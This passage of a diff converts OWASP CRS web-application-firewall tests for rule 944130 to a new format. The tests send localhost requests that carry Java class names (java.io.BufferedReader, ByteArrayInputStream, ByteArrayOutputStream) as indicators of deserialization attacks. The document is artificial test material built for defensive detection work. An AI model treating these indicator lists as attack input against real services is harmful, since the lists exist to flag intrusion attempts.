"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader=test" + output: + log: + expect_ids: [944130] + - test_id: 36 desc: "Cookie test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.BufferedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 37 desc: "Cookie name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.BufferedReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 38 desc: "Request header test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 39 desc: "XML attribute value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 40 desc: "XML element value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 41 desc: "Nested XML element value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 42 desc: "Content-Type text/plain includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 43 desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 44 desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.BufferedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.BufferedReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 45 desc: "Argument test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 46 desc: "Argument name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 47 desc: "Cookie test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 48 desc: "Cookie name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 49 desc: "Request header test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 50 desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 51 desc: "XML element value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 52 desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 53 desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 54 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 55 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ByteArrayInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 56 desc: "Argument test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 57 desc: "Argument name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 58 desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 59 desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 60 desc: "Request header test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 61 desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 62 desc: "XML element value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: 